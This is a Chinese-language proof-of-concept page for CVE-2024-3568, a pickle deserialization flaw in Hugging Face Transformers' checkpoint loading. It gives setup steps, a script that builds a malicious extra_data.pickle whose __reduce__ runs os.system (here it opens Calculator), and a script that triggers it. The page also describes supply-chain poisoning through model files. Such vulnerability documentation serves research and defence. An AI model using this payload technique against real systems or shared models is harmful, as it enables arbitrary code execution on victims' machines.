Awesome-POC/人工智能漏洞/Huggingface Transformers Checkpoint 反序列化漏洞 CVE-2024-3568.md
2025-03-10 16:59:16 +08:00

108 lines
3.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Huggingface Transformers Checkpoint 反序列化漏洞 CVE-2024-3568
## 漏洞描述
CVE-2024-3568 是 Huggingface 的 Transformers 库中存在的一个反序列化漏洞,该漏洞源于 `TFPreTrainedModel()` 类的 `load_repo_checkpoint()` 函数在反序列化未经信任的数据时,使用了不安全的 `pickle.load()` 方法。攻击者可以通过构造恶意的序列化负载,诱使受害者在正常的训练过程中加载看似无害的检查点,从而在目标机器上执行任意代码,导致远程代码执行。
此漏洞的利用方式可能包括供应链投毒,即攻击者在模型数据中插入恶意构造的数据,利用反序列化过程触发恶意代码执行。这类攻击的危险性在于,受害者将在不知情的情况下加载被篡改的模型 checkpoint导致攻击者在其系统上执行任意代码。
参考链接:
- https://github.com/advisories/GHSA-37q5-v5qm-c9v8
- https://github.com/huggingface/transformers/commit/693667b8ac8138b83f8adb6522ddaf42fa07c125
- https://huntr.com/bounties/b3c36992-5264-4d7f-9906-a996efafba8f
## 披露时间
```
2024.02.03
```
## 漏洞影响
```
transformers < 4.38.0
```
## 环境搭建
基于 python 3.9 创建一个虚拟环境,需要安装指定的版本的 `tensorflow``transformers``keras`,否则可能报兼容性错误:
```shell
# 创建工作目录
mkdir CVE-2024-3568 && cd CVE-2024-3568
# 使用 Python 3.9 创建新的 venv
python3.9 -m venv venv
source venv/bin/activate
# 安装兼容的 TensorFlow 版本
pip install --upgrade pip
pip install tensorflow==2.15 transformers==4.37.2 keras==2.15
```
登录 Huggingface 获取 AccessToken`huggingface-cli` 登录:
```
> huggingface-cli login
Enter your token (input will not be visible): xxxxxxxxx
```
目录结构:
```
CVE-2024-3568
├── awesome_poc
│   └── checkpoint
│   ├── extra_data.pickle
│   └── weights.h5
├── generate_payload.py
├── poc.py
└── venv
```
通过 `generate_payload.py` 生成 `extra_data.pickle``weights.h5`
- `extra_data.pickle`:序列化的元数据文件,模型加载时会使用 `pickle.load()` 加载这个文件。
- `weights.h5`:模型权重文件,与模型架构对应,否则将抛出异常。
```python
import pickle
import os
from transformers import TFAutoModel
class CExecute:
def __reduce__(self):
import os
cmd = 'open /System/Applications/Calculator.app'
return (os.system,(cmd,))
poc = CExecute()
with open('awesome_poc/checkpoint/extra_data.pickle', 'wb') as fp:
pickle.dump(poc,fp)
# Generate weights.h5
model = TFAutoModel.from_pretrained('google-bert/bert-base-uncased')
model.save_weights(os.path.join('awesome_poc', 'weights.h5'))
```
## 漏洞复现
`pickle` 反序列化的过程中,会调用对象的 `__reduce__` 方法,此时将会执行我们写入的命令 `open /System/Applications/Calculator.app`
通过 `poc.py` 模拟模型训练,加载带有恶意命令的 `checkpoint`
```python
from transformers import TFAutoModel
from tensorflow.keras.optimizers import Adam
model = TFAutoModel.from_pretrained('bert-base-uncased')
model.compile(optimizer=Adam(learning_rate=5e-5), loss='sparse_categorical_crossentropy', metrics=['accuracy'])
model.load_repo_checkpoint('awesome_poc')
```
![](images/Huggingface%20Transformers%20Checkpoint%20反序列化漏洞%20CVE-2024-3568/image-20250304154148096.png)
## 漏洞修复
- 升级 transformers 至最新版本 https://github.com/huggingface/transformers